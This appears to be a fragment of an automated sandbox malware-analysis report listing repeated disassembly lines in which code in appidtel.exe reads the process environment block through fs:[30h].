Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED mov eax, dword ptr fs:[00000030h]	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D52E2 mov eax, dword ptr fs:[00000030h]	10_2_039D52E2
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03937208 mov eax, dword ptr fs:[00000030h]	10_2_03937208
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03937208 mov eax, dword ptr fs:[00000030h]	10_2_03937208
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F823B mov eax, dword ptr fs:[00000030h]	10_2_038F823B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D5227 mov eax, dword ptr fs:[00000030h]	10_2_039D5227
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398D250 mov ecx, dword ptr fs:[00000030h]	10_2_0398D250
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03906259 mov eax, dword ptr fs:[00000030h]	10_2_03906259
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BB256 mov eax, dword ptr fs:[00000030h]	10_2_039BB256
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BB256 mov eax, dword ptr fs:[00000030h]	10_2_039BB256
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F9240 mov eax, dword ptr fs:[00000030h]	10_2_038F9240
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F9240 mov eax, dword ptr fs:[00000030h]	10_2_038F9240
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03988243 mov eax, dword ptr fs:[00000030h]	10_2_03988243
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03988243 mov ecx, dword ptr fs:[00000030h]	10_2_03988243
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393724D mov eax, dword ptr fs:[00000030h]	10_2_0393724D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FA250 mov eax, dword ptr fs:[00000030h]	10_2_038FA250
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F826B mov eax, dword ptr fs:[00000030h]	10_2_038F826B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03941270 mov eax, dword ptr fs:[00000030h]	10_2_03941270
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03941270 mov eax, dword ptr fs:[00000030h]	10_2_03941270
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03929274 mov eax, dword ptr fs:[00000030h]	10_2_03929274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274 mov eax, dword ptr fs:[00000030h]	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03904260 mov eax, dword ptr fs:[00000030h]	10_2_03904260
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03904260 mov eax, dword ptr fs:[00000030h]	10_2_03904260
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03904260 mov eax, dword ptr fs:[00000030h]	10_2_03904260
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CD26B mov eax, dword ptr fs:[00000030h]	10_2_039CD26B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CD26B mov eax, dword ptr fs:[00000030h]	10_2_039CD26B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03957190 mov eax, dword ptr fs:[00000030h]	10_2_03957190
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398019F mov eax, dword ptr fs:[00000030h]	10_2_0398019F
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398019F mov eax, dword ptr fs:[00000030h]	10_2_0398019F
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398019F mov eax, dword ptr fs:[00000030h]	10_2_0398019F
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398019F mov eax, dword ptr fs:[00000030h]	10_2_0398019F
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03940185 mov eax, dword ptr fs:[00000030h]	10_2_03940185
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BC188 mov eax, dword ptr fs:[00000030h]	10_2_039BC188
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BC188 mov eax, dword ptr fs:[00000030h]	10_2_039BC188
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FA197 mov eax, dword ptr fs:[00000030h]	10_2_038FA197
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FA197 mov eax, dword ptr fs:[00000030h]	10_2_038FA197
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FA197 mov eax, dword ptr fs:[00000030h]	10_2_038FA197
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391B1B0 mov eax, dword ptr fs:[00000030h]	10_2_0391B1B0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B11A4 mov eax, dword ptr fs:[00000030h]	10_2_039B11A4
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B11A4 mov eax, dword ptr fs:[00000030h]	10_2_039B11A4
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B11A4 mov eax, dword ptr fs:[00000030h]	10_2_039B11A4
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B11A4 mov eax, dword ptr fs:[00000030h]	10_2_039B11A4
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393D1D0 mov eax, dword ptr fs:[00000030h]	10_2_0393D1D0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393D1D0 mov ecx, dword ptr fs:[00000030h]	10_2_0393D1D0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397E1D0 mov eax, dword ptr fs:[00000030h]	10_2_0397E1D0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397E1D0 mov eax, dword ptr fs:[00000030h]	10_2_0397E1D0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397E1D0 mov ecx, dword ptr fs:[00000030h]	10_2_0397E1D0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397E1D0 mov eax, dword ptr fs:[00000030h]	10_2_0397E1D0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397E1D0 mov eax, dword ptr fs:[00000030h]	10_2_0397E1D0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D51CB mov eax, dword ptr fs:[00000030h]	10_2_039D51CB
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C61C3 mov eax, dword ptr fs:[00000030h]	10_2_039C61C3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C61C3 mov eax, dword ptr fs:[00000030h]	10_2_039C61C3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039A71F9 mov esi, dword ptr fs:[00000030h]	10_2_039A71F9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039301F8 mov eax, dword ptr fs:[00000030h]	10_2_039301F8
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D61E5 mov eax, dword ptr fs:[00000030h]	10_2_039D61E5
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039251EF mov eax, dword ptr fs:[00000030h]	10_2_039251EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039051ED mov eax, dword ptr fs:[00000030h]	10_2_039051ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039AA118 mov ecx, dword ptr fs:[00000030h]	10_2_039AA118
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039AA118 mov eax, dword ptr fs:[00000030h]	10_2_039AA118
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039AA118 mov eax, dword ptr fs:[00000030h]	10_2_039AA118
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039AA118 mov eax, dword ptr fs:[00000030h]	10_2_039AA118
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C0115 mov eax, dword ptr fs:[00000030h]	10_2_039C0115
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03901131 mov eax, dword ptr fs:[00000030h]	10_2_03901131
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03901131 mov eax, dword ptr fs:[00000030h]	10_2_03901131
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03930124 mov eax, dword ptr fs:[00000030h]	10_2_03930124
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FB136 mov eax, dword ptr fs:[00000030h]	10_2_038FB136
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FB136 mov eax, dword ptr fs:[00000030h]	10_2_038FB136
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FB136 mov eax, dword ptr fs:[00000030h]	10_2_038FB136
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FB136 mov eax, dword ptr fs:[00000030h]	10_2_038FB136
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03998158 mov eax, dword ptr fs:[00000030h]	10_2_03998158
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03907152 mov eax, dword ptr fs:[00000030h]	10_2_03907152
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03906154 mov eax, dword ptr fs:[00000030h]	10_2_03906154
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03906154 mov eax, dword ptr fs:[00000030h]	10_2_03906154
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F9148 mov eax, dword ptr fs:[00000030h]	10_2_038F9148
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F9148 mov eax, dword ptr fs:[00000030h]	10_2_038F9148
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F9148 mov eax, dword ptr fs:[00000030h]	10_2_038F9148
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F9148 mov eax, dword ptr fs:[00000030h]	10_2_038F9148
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D5152 mov eax, dword ptr fs:[00000030h]	10_2_039D5152
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FC156 mov eax, dword ptr fs:[00000030h]	10_2_038FC156
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03994144 mov eax, dword ptr fs:[00000030h]	10_2_03994144
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03994144 mov eax, dword ptr fs:[00000030h]	10_2_03994144
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03994144 mov ecx, dword ptr fs:[00000030h]	10_2_03994144
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03994144 mov eax, dword ptr fs:[00000030h]	10_2_03994144
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03994144 mov eax, dword ptr fs:[00000030h]	10_2_03994144
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03999179 mov eax, dword ptr fs:[00000030h]	10_2_03999179
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172 mov eax, dword ptr fs:[00000030h]	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FD08D mov eax, dword ptr fs:[00000030h]	10_2_038FD08D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392D090 mov eax, dword ptr fs:[00000030h]	10_2_0392D090
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392D090 mov eax, dword ptr fs:[00000030h]	10_2_0392D090
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03905096 mov eax, dword ptr fs:[00000030h]	10_2_03905096
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393909C mov eax, dword ptr fs:[00000030h]	10_2_0393909C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398D080 mov eax, dword ptr fs:[00000030h]	10_2_0398D080
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398D080 mov eax, dword ptr fs:[00000030h]	10_2_0398D080
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390208A mov eax, dword ptr fs:[00000030h]	10_2_0390208A
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C60B8 mov eax, dword ptr fs:[00000030h]	10_2_039C60B8
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C60B8 mov ecx, dword ptr fs:[00000030h]	10_2_039C60B8
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039980A8 mov eax, dword ptr fs:[00000030h]	10_2_039980A8
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D50D9 mov eax, dword ptr fs:[00000030h]	10_2_039D50D9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039820DE mov eax, dword ptr fs:[00000030h]	10_2_039820DE
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039290DB mov eax, dword ptr fs:[00000030h]	10_2_039290DB
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov ecx, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov ecx, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov ecx, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov ecx, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0 mov eax, dword ptr fs:[00000030h]	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397D0C0 mov eax, dword ptr fs:[00000030h]	10_2_0397D0C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397D0C0 mov eax, dword ptr fs:[00000030h]	10_2_0397D0C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039420F0 mov ecx, dword ptr fs:[00000030h]	10_2_039420F0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FA0E3 mov ecx, dword ptr fs:[00000030h]	10_2_038FA0E3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039250E4 mov eax, dword ptr fs:[00000030h]	10_2_039250E4
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039250E4 mov ecx, dword ptr fs:[00000030h]	10_2_039250E4
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039860E0 mov eax, dword ptr fs:[00000030h]	10_2_039860E0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039080E9 mov eax, dword ptr fs:[00000030h]	10_2_039080E9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FC0F0 mov eax, dword ptr fs:[00000030h]	10_2_038FC0F0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391E016 mov eax, dword ptr fs:[00000030h]	10_2_0391E016
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391E016 mov eax, dword ptr fs:[00000030h]	10_2_0391E016
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391E016 mov eax, dword ptr fs:[00000030h]	10_2_0391E016
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391E016 mov eax, dword ptr fs:[00000030h]	10_2_0391E016
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03984000 mov ecx, dword ptr fs:[00000030h]	10_2_03984000
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C903E mov eax, dword ptr fs:[00000030h]	10_2_039C903E
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C903E mov eax, dword ptr fs:[00000030h]	10_2_039C903E
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C903E mov eax, dword ptr fs:[00000030h]	10_2_039C903E
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C903E mov eax, dword ptr fs:[00000030h]	10_2_039C903E
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FA020 mov eax, dword ptr fs:[00000030h]	10_2_038FA020
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FC020 mov eax, dword ptr fs:[00000030h]	10_2_038FC020
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03902050 mov eax, dword ptr fs:[00000030h]	10_2_03902050
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392B052 mov eax, dword ptr fs:[00000030h]	10_2_0392B052
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039A705E mov ebx, dword ptr fs:[00000030h]	10_2_039A705E
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039A705E mov eax, dword ptr fs:[00000030h]	10_2_039A705E
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03986050 mov eax, dword ptr fs:[00000030h]	10_2_03986050
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov ecx, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h]	10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392C073 mov eax, dword ptr fs:[00000030h]	10_2_0392C073
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397D070 mov ecx, dword ptr fs:[00000030h]	10_2_0397D070
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398106E mov eax, dword ptr fs:[00000030h]	10_2_0398106E
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D5060 mov eax, dword ptr fs:[00000030h]	10_2_039D5060
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BF78A mov eax, dword ptr fs:[00000030h]	10_2_039BF78A
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392D7B0 mov eax, dword ptr fs:[00000030h]	10_2_0392D7B0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D37B6 mov eax, dword ptr fs:[00000030h]	10_2_039D37B6
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039897A9 mov eax, dword ptr fs:[00000030h]	10_2_039897A9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF7BA mov eax, dword ptr fs:[00000030h]	10_2_038FF7BA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF7BA mov eax, dword ptr fs:[00000030h]	10_2_038FF7BA
